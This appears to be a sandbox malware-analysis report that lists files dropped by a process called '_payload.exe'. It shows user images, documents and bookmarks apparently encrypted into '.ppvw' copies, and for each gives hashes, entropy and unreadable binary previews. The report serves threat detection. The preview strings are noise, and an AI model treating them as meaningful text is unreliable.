                                                                                                                          Preview:ONBQC.S-....p..J....U...M.r7_^%.=.'p..c...<....l.~.2.....mJ.<R+Bpk.E.|*:.N.`..F.....E.......LY5..z.G(67..X.....?.$.......k..S....=A9..@H.\<.}..J.@vw...z"Krm.a.-...o.W..HQ....4.*V+......>js..nG.?.5.F(..Ax....Vz..|..:.q..........s..&.a..K.e~e.>...* ...w...#..U-r.....%D......;.YZP.=.x|..... 0*...~4..X..t......!d.......s...P5..jq?.j.amc..X...8n-.8(zW....."6...............&.^L".......Lo1I..W.a..y=8...g.`S0........43...?.(bF..4...\..a-....H.y...*..9.Fp..O[.#F..+.......M.<......Ng....P.K[..O.9p.7.y.y........N@.3<..MJ....A..GszLS..L.-.~...?I...s%mq.n{_:P&Lx<....j.Q.p..s...b..[Bj7..c.)b.....XO.VD......>.....Eb|(HlI.CH].v.w!)%.t..'.A4~.X|.wN{..d....%..r..{..L..T..b4\.....G.w.d.....M.d..a..r....d~.!.Z.._...q.r....)..^.......@....wu.iZ.........m.7.J4.(....0.E...o..`..7n.....>/..!.K0..]=...O... ..?}...Z.Eb...R.@....W....Q..|L4.....f.............0|PT.i\q/y.q...$.V...zGN...W...p.8.c...._...h.K...%|.....A2....g.^...W..q.r6l..}l.....&..l+.SZ.J..B..0.W.

                                                                                                                          C:\Users\user\Downloads\UMMBDNEQBN.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.839482828518955
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ZGb8jfHKrkFPuOmLvt4h1Mslxa2lhQrlnvWKVlI+4+DIbD:ZGwjfHBGOmp4h1MAxEbZp+D
                                                                                                                          MD5:0F967D3157610001E36FDB369B870BDD
                                                                                                                          SHA1:2239543E4FE4826281FD3D05F1693BFFFE094167
                                                                                                                          SHA-256:1D8446CD6878B54269E3CA8298D559281F59263FD8945A890F37AAF6AAF02F0E
                                                                                                                          SHA-512:B0D672FB2DAFBD0D685FF27CF34EBB55D964CFDAEAE6DADFA0CDDF699695C2AE2000B6A5ECF4F511078BA4CD752D407C1B8F1A2A5AC9805CA4FFFE66398CA123
                                                                                                                          Malicious:false
                                                                                                                          Preview:UMMBD>.j7+.y....@..N.PM?..q....\.....9.MX...#",Jb..w.N.^...'"......P....o<.?.k..]vB.X\.&.V.;...L...o.#..!...7.AY.....q .5;+..Jm.|Ei.........u-...G..^...".....O.4..V..n.i.*._;...l.K.^].1..._.u.S.......>..A...*.hh........-u.......H1.s..*.]V.;.../~4^@H.....#N...4<l...2..?."[.m.<..@7.P.VzA./U..a;54..v...,7B.9#.j3.....?........V..w.....O#....`*.9..;8.-^..!\.Tl....x.[E!....8..9.!.....s!v..bN-.._WWY2.A...P....#...U......(....Y.....)..U.._...;.+......b..74.,..8.MJU.....c @i...a......@..e.q...r.~..T....4...w"..tm...2K......\.n.3.l.....H'xY...di..`....7..L.q;....".....S....(Y.C...tx...+....."i............r....Rv<RF..S..5..n...Nw.!..S..S.H..."..HX...x`...D... ..<W.....J...Z.V<.I.tK.9E.7.....Z......k...Ei..w. ...>...=(.,..........+*......!KNHZ.xb2.A.v.7...f,.........0?..M.q..f2....TM.}7S.A..7....(.....>.i.{.Da`J..L....$6.&.sz...........W.<..E........6.).*k..2....X8$}."k...'....{..-.0......p.....X.{.[.. ..:5....iS..7.a.].......%u.l{......O....H.Mw.

                                                                                                                          C:\Users\user\Downloads\UMMBDNEQBN.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.839482828518955
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ZGb8jfHKrkFPuOmLvt4h1Mslxa2lhQrlnvWKVlI+4+DIbD:ZGwjfHBGOmp4h1MAxEbZp+D
                                                                                                                          MD5:0F967D3157610001E36FDB369B870BDD
                                                                                                                          SHA1:2239543E4FE4826281FD3D05F1693BFFFE094167
                                                                                                                          SHA-256:1D8446CD6878B54269E3CA8298D559281F59263FD8945A890F37AAF6AAF02F0E
                                                                                                                          SHA-512:B0D672FB2DAFBD0D685FF27CF34EBB55D964CFDAEAE6DADFA0CDDF699695C2AE2000B6A5ECF4F511078BA4CD752D407C1B8F1A2A5AC9805CA4FFFE66398CA123
                                                                                                                          Malicious:false
                                                                                                                          Preview:UMMBD>.j7+.y....@..N.PM?..q....\.....9.MX...#",Jb..w.N.^...'"......P....o<.?.k..]vB.X\.&.V.;...L...o.#..!...7.AY.....q .5;+..Jm.|Ei.........u-...G..^...".....O.4..V..n.i.*._;...l.K.^].1..._.u.S.......>..A...*.hh........-u.......H1.s..*.]V.;.../~4^@H.....#N...4<l...2..?."[.m.<..@7.P.VzA./U..a;54..v...,7B.9#.j3.....?........V..w.....O#....`*.9..;8.-^..!\.Tl....x.[E!....8..9.!.....s!v..bN-.._WWY2.A...P....#...U......(....Y.....)..U.._...;.+......b..74.,..8.MJU.....c @i...a......@..e.q...r.~..T....4...w"..tm...2K......\.n.3.l.....H'xY...di..`....7..L.q;....".....S....(Y.C...tx...+....."i............r....Rv<RF..S..5..n...Nw.!..S..S.H..."..HX...x`...D... ..<W.....J...Z.V<.I.tK.9E.7.....Z......k...Ei..w. ...>...=(.,..........+*......!KNHZ.xb2.A.v.7...f,.........0?..M.q..f2....TM.}7S.A..7....(.....>.i.{.Da`J..L....$6.&.sz...........W.<..E........6.).*k..2....X8$}."k...'....{..-.0......p.....X.{.[.. ..:5....iS..7.a.].......%u.l{......O....H.Mw.

                                                                                                                          C:\Users\user\Downloads\UOOJJOZIRH.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.849630365109529
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:64bAJ76hxqYiYd9/sQOhX1QgluGXdDF2FDS2QaMUNlkz8q13NObD:jbANexiYf/CXa2phwSJU0JWD
                                                                                                                          MD5:192B277344AE8FD3F781607E8382DAC3
                                                                                                                          SHA1:C2701A78AC0E00765B7548589CA47A7652F31A90
                                                                                                                          SHA-256:4042C59EAE2316765BAEFAF9088B55A1982976C955C788AE7E37CB7987CB80D1
                                                                                                                          SHA-512:BA4F574B992C7DAF1603259C163DB7471884EC43E2D478FCBA072C97B5AC813B027A27A7F7C490D0BC19225923378F7A689690CE70DB5BCE18AC4C7A7F804AE1
                                                                                                                          Malicious:false
                                                                                                                          Preview:UOOJJ`.V8 V;_.c..H....l)k..?=Y...@.......L.f..o"3. E9x....C.5.h.8...$..m..;.$3.$]..L...........>....2a."..O..".....R.G...O...1#.%..f$.x....&....t\.og...E..#..%.......<.....L.\.qzs.\.Gtqa.... ...z..|1._...%....f).r....~5:O'.b.6..q.PC....%._..S....e).Y....i...{.G....].t.N..'.;..I.%].Y....^..i.Dr.?[....~Df*...bv.C.`..b...4........M.t5=..F.i...8..Pc..nH(,&..qT[?....t.Q.+.s.q..j...)..8..&~<.*y..f........)a.N?|\._pm...._.=....!.P.F.@..U.)+..FFH....-f.9kX....as..../..wB".%..F.......*...C..o.MO.g......nY./....9.lT..[..+V..nkm>.$.^.Hyg....'..>....t...ix.+L.V.I..>..k....V...._fNK....p1.QoMuQR.FIF....H:e.9.'.....T.tI(f.o.#.....zr..G8gO.V..N.4..&.........0......j.mh.B..G.. O.f.U......d....]e.%..Ga...R=.w.X...p...K..u:}GF.|.<V....I..../......Tw...{.d.n'HU.......<...e...qY....e..C..D...e%t<..ugP..1.....FH E.q....|...o..h..m.<..]^...............%.............ZCt...t...p...-..j.k...Q...z$H..I.zxM.e.=.'..#...n..+.b2...z..N..7d..a..Z.....lf..g..+....

                                                                                                                          C:\Users\user\Downloads\UOOJJOZIRH.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.849630365109529
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:64bAJ76hxqYiYd9/sQOhX1QgluGXdDF2FDS2QaMUNlkz8q13NObD:jbANexiYf/CXa2phwSJU0JWD
                                                                                                                          MD5:192B277344AE8FD3F781607E8382DAC3
                                                                                                                          SHA1:C2701A78AC0E00765B7548589CA47A7652F31A90
                                                                                                                          SHA-256:4042C59EAE2316765BAEFAF9088B55A1982976C955C788AE7E37CB7987CB80D1
                                                                                                                          SHA-512:BA4F574B992C7DAF1603259C163DB7471884EC43E2D478FCBA072C97B5AC813B027A27A7F7C490D0BC19225923378F7A689690CE70DB5BCE18AC4C7A7F804AE1
                                                                                                                          Malicious:false
                                                                                                                          Preview:UOOJJ`.V8 V;_.c..H....l)k..?=Y...@.......L.f..o"3. E9x....C.5.h.8...$..m..;.$3.$]..L...........>....2a."..O..".....R.G...O...1#.%..f$.x....&....t\.og...E..#..%.......<.....L.\.qzs.\.Gtqa.... ...z..|1._...%....f).r....~5:O'.b.6..q.PC....%._..S....e).Y....i...{.G....].t.N..'.;..I.%].Y....^..i.Dr.?[....~Df*...bv.C.`..b...4........M.t5=..F.i...8..Pc..nH(,&..qT[?....t.Q.+.s.q..j...)..8..&~<.*y..f........)a.N?|\._pm...._.=....!.P.F.@..U.)+..FFH....-f.9kX....as..../..wB".%..F.......*...C..o.MO.g......nY./....9.lT..[..+V..nkm>.$.^.Hyg....'..>....t...ix.+L.V.I..>..k....V...._fNK....p1.QoMuQR.FIF....H:e.9.'.....T.tI(f.o.#.....zr..G8gO.V..N.4..&.........0......j.mh.B..G.. O.f.U......d....]e.%..Ga...R=.w.X...p...K..u:}GF.|.<V....I..../......Tw...{.d.n'HU.......<...e...qY....e..C..D...e%t<..ugP..1.....FH E.q....|...o..h..m.<..]^...............%.............ZCt...t...p...-..j.k...Q...z$H..I.zxM.e.=.'..#...n..+.b2...z..N..7d..a..Z.....lf..g..+....

                                                                                                                          C:\Users\user\Downloads\VLZDGUKUTZ.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.834987118712728
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:KCWNH7XGFgSP209KzHbaKVjVW3efy25So2vYjECsysscWddWN3ojsgyBbD:KCuGAZHbfVjsufpVjPsb+dWN3KsgyRD
                                                                                                                          MD5:064E998E5BE49A9CB238E580745A639C
                                                                                                                          SHA1:DDDD0246D18EA2581A8E0374471BCB16A86AD945
                                                                                                                          SHA-256:D525BDDFEED14963A5FBBEBEC8F6E0ED3F1895A1590DCA1884CBE6604E61C5DE
                                                                                                                          SHA-512:35A77D3BD9238333A94503CDFBF71F51F5E237F80A367E30A227F1107D37EE676FD0A7E7F2E6E2B154F6E4BDF6613D7F625C999CCEB8AC9955BC0BE10B6888EE
                                                                                                                          Malicious:false
                                                                                                                          Preview:VLZDG.~.'..$`...():.A.<..N.u.7.g.$.... `....7..$..$^.R...po@........ZP.(r$.F...D.er.x.-.j....|...e*l*...D0.o....mm.8.5..#....s.54KGX.....u..$......L.9.<./s...J.O..H...b%..Kq.s2...._-..[..'n...8..((.s..*.....6.X.......(X.....1t..b.#.x...ZV!.......;-!,OG.y...b........E.j..d.[.2.........b@.9..Ye......i.\y..w...@.7JHf.9.i....T..........{..'........e....z.'..B.^4.&..,..?1.et.N.........y...n.m3..x......=Qr.|.N...#,wO/ .....B.o.......M..iAg..WD..........O#7........R~......&S`.y.+y...w...y.F{C.]..s@.....?j.[yF.."c......kn,rc.7Y....1(A.M'....>..i...Itd..........C...c..E..i...0';...G..l...g..../. ....'A.,..h..s...8c.Gz.DlP.;..w..'...C.0.N.E.}....XZz..X.H..g..Yu..E.zS...y$...T.5t.v.......Q.:..5I-..S.(T..@I..O.:....".@....h.7h.'..U\.M>F..T.-..h..O....[.l..GRLG.?.......`.+...(.,2i..*...9*@...p.v..Vj..{.}bQ..?.... .D.....9{P[4."..T....X.....TZ.3c....Y......`..A......C,Gl.Ms.t..s.y...|..gt.U.......G..,`.v}0...F?+.J....AK.......s,.q...:...z&..C.t"54.

                                                                                                                          C:\Users\user\Downloads\VLZDGUKUTZ.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.834987118712728
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:KCWNH7XGFgSP209KzHbaKVjVW3efy25So2vYjECsysscWddWN3ojsgyBbD:KCuGAZHbfVjsufpVjPsb+dWN3KsgyRD
                                                                                                                          MD5:064E998E5BE49A9CB238E580745A639C
                                                                                                                          SHA1:DDDD0246D18EA2581A8E0374471BCB16A86AD945
                                                                                                                          SHA-256:D525BDDFEED14963A5FBBEBEC8F6E0ED3F1895A1590DCA1884CBE6604E61C5DE
                                                                                                                          SHA-512:35A77D3BD9238333A94503CDFBF71F51F5E237F80A367E30A227F1107D37EE676FD0A7E7F2E6E2B154F6E4BDF6613D7F625C999CCEB8AC9955BC0BE10B6888EE
                                                                                                                          Malicious:false
                                                                                                                          Preview:VLZDG.~.'..$`...():.A.<..N.u.7.g.$.... `....7..$..$^.R...po@........ZP.(r$.F...D.er.x.-.j....|...e*l*...D0.o....mm.8.5..#....s.54KGX.....u..$......L.9.<./s...J.O..H...b%..Kq.s2...._-..[..'n...8..((.s..*.....6.X.......(X.....1t..b.#.x...ZV!.......;-!,OG.y...b........E.j..d.[.2.........b@.9..Ye......i.\y..w...@.7JHf.9.i....T..........{..'........e....z.'..B.^4.&..,..?1.et.N.........y...n.m3..x......=Qr.|.N...#,wO/ .....B.o.......M..iAg..WD..........O#7........R~......&S`.y.+y...w...y.F{C.]..s@.....?j.[yF.."c......kn,rc.7Y....1(A.M'....>..i...Itd..........C...c..E..i...0';...G..l...g..../. ....'A.,..h..s...8c.Gz.DlP.;..w..'...C.0.N.E.}....XZz..X.H..g..Yu..E.zS...y$...T.5t.v.......Q.:..5I-..S.(T..@I..O.:....".@....h.7h.'..U\.M>F..T.-..h..O....[.l..GRLG.?.......`.+...(.,2i..*...9*@...p.v..Vj..{.}bQ..?.... .D.....9{P[4."..T....X.....TZ.3c....Y......`..A......C,Gl.Ms.t..s.y...|..gt.U.......G..,`.v}0...F?+.J....AK.......s,.q...:...z&..C.t"54.

                                                                                                                          C:\Users\user\Downloads\WUTJSCBCFX.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.841912994921788
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:9pwLFE5n0tTQVWmGPCR36MepqfFgdRt8BClJztVUFqsKGivFLGAbD:/n0t8UmGPCR5eddT88jDdsKGivFjD
                                                                                                                          MD5:776F6E8C801D2A8211C17461F50E272B
                                                                                                                          SHA1:A17FD45F86382700199D77FBAB5275374F710BBA
                                                                                                                          SHA-256:7D886A1A15192D617F30AD65042143CA1E3EEF0D111642D837CFC90B3BDD8218
                                                                                                                          SHA-512:877C6AC050ACE267F8BB0C9587F4A11CB3756D81DAE5A201C468C6143057FF8C3310D1675760E236DF01A9FB1D68939DF9738FFA3357C0D4A3E2A9E532010987
                                                                                                                          Malicious:false
                                                                                                                          Preview:WUTJS? B.D...T_k.%3.qB.......5.......U.`._.#...2..H..+.A.L.".e{...x\Zb..,.0.Xc..rK...sq\.r.;.7....bN:yT...).7.Xd.M.;....i..;.k6.jY.|..xX.3......8....M....4J..x..MR@........wZEE....t....a~U{.Sv..6.R5.k.f.dV?._...8.TP......y~n..W...s.1-0U..K..K .|4....H...].d....B..rtwB....{.r.e.R y,$.?,~...".))...=F.A...py...cw.0...D.+.%/...:.I..ZE..I..+.LS.=b.{.......J..f.f.`\.$5.-..z...C...V...k_...&...m.",g..\.7U.....@>...Ljk..<A..kw..a.n..-.&.3.....-.....6.......e......='..;@w.......:X+.....?)...3l..7.....(...... .../6..6I....)..A..."~.UN;p.O8|%..o...u..fi.........T&...R...pM...,..F..'.M...$..d.W.........:...!....X\O..@.$......fc*OB.X.L......}S.....,...H.V.3.....<.{........LE..!.m...pb]o...m......8[....AVu...[.:1$.!.mn.p.=..t^X.vVo.|u.D^.e..x.....h%.y..P....<.M...^p..?5.aA.T..\.&..7zk.2..@...7.h'1..6....(..>.8.T.K...kGj.....;.\.!.Z.B.4!...e...&.]..Z.n..j..L......7b.+..?.q.......z&...u...&Z........Puw.`KB..X.@{.S.L..B..q|&$'..!.!.NL.O..i>m.8.

                                                                                                                          C:\Users\user\Downloads\WUTJSCBCFX.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.841912994921788
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:9pwLFE5n0tTQVWmGPCR36MepqfFgdRt8BClJztVUFqsKGivFLGAbD:/n0t8UmGPCR5eddT88jDdsKGivFjD
                                                                                                                          MD5:776F6E8C801D2A8211C17461F50E272B
                                                                                                                          SHA1:A17FD45F86382700199D77FBAB5275374F710BBA
                                                                                                                          SHA-256:7D886A1A15192D617F30AD65042143CA1E3EEF0D111642D837CFC90B3BDD8218
                                                                                                                          SHA-512:877C6AC050ACE267F8BB0C9587F4A11CB3756D81DAE5A201C468C6143057FF8C3310D1675760E236DF01A9FB1D68939DF9738FFA3357C0D4A3E2A9E532010987
                                                                                                                          Malicious:false
                                                                                                                          Preview:WUTJS? B.D...T_k.%3.qB.......5.......U.`._.#...2..H..+.A.L.".e{...x\Zb..,.0.Xc..rK...sq\.r.;.7....bN:yT...).7.Xd.M.;....i..;.k6.jY.|..xX.3......8....M....4J..x..MR@........wZEE....t....a~U{.Sv..6.R5.k.f.dV?._...8.TP......y~n..W...s.1-0U..K..K .|4....H...].d....B..rtwB....{.r.e.R y,$.?,~...".))...=F.A...py...cw.0...D.+.%/...:.I..ZE..I..+.LS.=b.{.......J..f.f.`\.$5.-..z...C...V...k_...&...m.",g..\.7U.....@>...Ljk..<A..kw..a.n..-.&.3.....-.....6.......e......='..;@w.......:X+.....?)...3l..7.....(...... .../6..6I....)..A..."~.UN;p.O8|%..o...u..fi.........T&...R...pM...,..F..'.M...$..d.W.........:...!....X\O..@.$......fc*OB.X.L......}S.....,...H.V.3.....<.{........LE..!.m...pb]o...m......8[....AVu...[.:1$.!.mn.p.=..t^X.vVo.|u.D^.e..x.....h%.y..P....<.M...^p..?5.aA.T..\.&..7zk.2..@...7.h'1..6....(..>.8.T.K...kGj.....;.\.!.Z.B.4!...e...&.]..Z.n..j..L......7b.+..?.q.......z&...u...&Z........Puw.`KB..X.@{.S.L..B..q|&$'..!.!.NL.O..i>m.8.

                                                                                                                          C:\Users\user\Favorites\Amazon.url

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):445
                                                                                                                          Entropy (8bit):7.421218150031455
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:ths80LjjwcewCPz2C0m7FchiYmW3zq5bTcii9a:E80L3buPa5YzZbD
                                                                                                                          MD5:797E28EE2E103BDC2A44EFE864440522
                                                                                                                          SHA1:5E0919D188A515485027CB0A8FA49B7E7AA07A32
                                                                                                                          SHA-256:306BFAD2C3560C4709089E59CCBAB91C636353048D0D976AF16D397DBE84CC9B
                                                                                                                          SHA-512:C6D5910BC515843C74B7749661CC655F87083FA15D682F62FC7A4F30437E0D56233F42A6E1429873BE3ABE20B58CEF7F2E076AEBE6AABDBC1664CEEBA0ABC18B
                                                                                                                          Malicious:false
                                                                                                                          Preview:[{000.}`H.@C..}.......%s-.B...V.......x.W.. .~...O.2,5.H.{.....:Hfx..b...h.;N.....s.........k2O...1....u81C.}..'.5+....b.Q..I....R6..kB{.O$J[9.=.mY-..'...z....??..._.-q....n..F...C$W.Y.....!.9'#H."....Y[...[...p...=.S...BM<...V.P.v..eK....u2A....w)Fa..E.....N../.k...|.'>.t......J.h~....).._l./.$:... ..f......z.......(.....s%..L....w..../'...J.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Favorites\Amazon.url.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):445
                                                                                                                          Entropy (8bit):7.421218150031455
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:ths80LjjwcewCPz2C0m7FchiYmW3zq5bTcii9a:E80L3buPa5YzZbD
                                                                                                                          MD5:797E28EE2E103BDC2A44EFE864440522
                                                                                                                          SHA1:5E0919D188A515485027CB0A8FA49B7E7AA07A32
                                                                                                                          SHA-256:306BFAD2C3560C4709089E59CCBAB91C636353048D0D976AF16D397DBE84CC9B
                                                                                                                          SHA-512:C6D5910BC515843C74B7749661CC655F87083FA15D682F62FC7A4F30437E0D56233F42A6E1429873BE3ABE20B58CEF7F2E076AEBE6AABDBC1664CEEBA0ABC18B
                                                                                                                          Malicious:false
                                                                                                                          Preview:[{000.}`H.@C..}.......%s-.B...V.......x.W.. .~...O.2,5.H.{.....:Hfx..b...h.;N.....s.........k2O...1....u81C.}..'.5+....b.Q..I....R6..kB{.O$J[9.=.mY-..'...z....??..._.-q....n..F...C$W.Y.....!.9'#H."....Y[...[...p...=.S...BM<...V.P.v..eK....u2A....w)Fa..E.....N../.k...|.'>.t......J.h~....).._l./.$:... ..f......z.......(.....s%..L....w..../'...J.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Favorites\Facebook.url

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):447
                                                                                                                          Entropy (8bit):7.412685538162287
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:i5wytBXywAb1nsRxmKQG6aUE5PJd1RprPfq5bTcii9a:iuyDYsRYKQG6aUmrRprPCbD
                                                                                                                          MD5:698D9BDF3A949A0E2682D2D83267558C
                                                                                                                          SHA1:F027F10DA472D8B8AF25D8364BC279F18F5E2AE3
                                                                                                                          SHA-256:91C67475FA50BE17485371590CAEB6BE06EED4795131FA6A96F80625545089EE
                                                                                                                          SHA-512:1B7640435CB625654275F3853F33F814FFD09B53EB43D598164532D3B3E572CF7844EC4FB6DBFA25D4FD7A5898EE21BEBEED1338EA8023F69697268A9A78CC16
                                                                                                                          Malicious:false
                                                                                                                          Preview:[{000.].......u....u..7-..J...j.W........&B...~..n...c....>PZ..Rf!<........xB(....]..%"..#.aV./..u..Dvn.4..l ...}.<.|....P...R..1!'.. sI\7^D.U.y\[..p.* . m.1.....,..s....nG..1.K)..|I..d.....m..!..:.O...K....NBx.(..Fp..p..E.'2..-.SU.o.A .kve....2.CXYU4.. .K.bw...*...'.-V....rc...<./kR:.G.....v..8..>.Y....U........hEd....8.mI.&v.)....V..5&..kJ....w._.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Favorites\Facebook.url.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):447
                                                                                                                          Entropy (8bit):7.412685538162287
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:i5wytBXywAb1nsRxmKQG6aUE5PJd1RprPfq5bTcii9a:iuyDYsRYKQG6aUmrRprPCbD
                                                                                                                          MD5:698D9BDF3A949A0E2682D2D83267558C
                                                                                                                          SHA1:F027F10DA472D8B8AF25D8364BC279F18F5E2AE3
                                                                                                                          SHA-256:91C67475FA50BE17485371590CAEB6BE06EED4795131FA6A96F80625545089EE
                                                                                                                          SHA-512:1B7640435CB625654275F3853F33F814FFD09B53EB43D598164532D3B3E572CF7844EC4FB6DBFA25D4FD7A5898EE21BEBEED1338EA8023F69697268A9A78CC16
                                                                                                                          Malicious:false
                                                                                                                          Preview:[{000.].......u....u..7-..J...j.W........&B...~..n...c....>PZ..Rf!<........xB(....]..%"..#.aV./..u..Dvn.4..l ...}.<.|....P...R..1!'.. sI\7^D.U.y\[..p.* . m.1.....,..s....nG..1.K)..|I..d.....m..!..:.O...K....NBx.(..Fp..p..E.'2..-.SU.o.A .kve....2.CXYU4.. .K.bw...*...'.-V....rc...<./kR:.G.....v..8..>.Y....U........hEd....8.mI.&v.)....V..5&..kJ....w._.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Favorites\Live.url

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):443
                                                                                                                          Entropy (8bit):7.413019621466793
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:0lYEayvjdv5VOHaeMk1P0/6Eq5bTcii9a:OhaGJhB7k180bD
                                                                                                                          MD5:DCEF32FC5B1CAEBE91AE897F7D56E8FA
                                                                                                                          SHA1:7AD6C4C311FE2B8297F7ED56D41B08A6BD29DB2B
                                                                                                                          SHA-256:EB6163D5EDD34B2183AEAF11CC3886F994F67BA7422B30B5412394C6A04AEB0E
                                                                                                                          SHA-512:C9910C159EA4026E0DE99458932317745F2D7BFDBDA30CB8D565FE8B15DEC10A9C54E8BAE034A4CEBFA69056DB14532E7BA078A598BF1F40C188F4D2BB1E7BA1
                                                                                                                          Malicious:false
                                                                                                                          Preview:[{000...5..t.'..;..X...(..B..N....I..../8H~....&"H._..B..Z%.$f....RB..PX..P&.:h.8.O.<.....n....?p.z..F.k...3.*...8.?..p;.JY..B.y.I.y.X...\<.........M.q7.e}.i..5..N7.t..,1Ln...i....ij.............x.f...jb.O.6.......Ip.Zzy.@C...u;.q..+...TC4...X2sH.]n..n:.x..)..QD5VW.3.y.....!..z.=*.....~>.....!Q.\24._.nC.ju{.J.y..$C4.S...M....z.).A.......g..U.YS.'phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Favorites\Live.url.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):443
                                                                                                                          Entropy (8bit):7.413019621466793
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:0lYEayvjdv5VOHaeMk1P0/6Eq5bTcii9a:OhaGJhB7k180bD
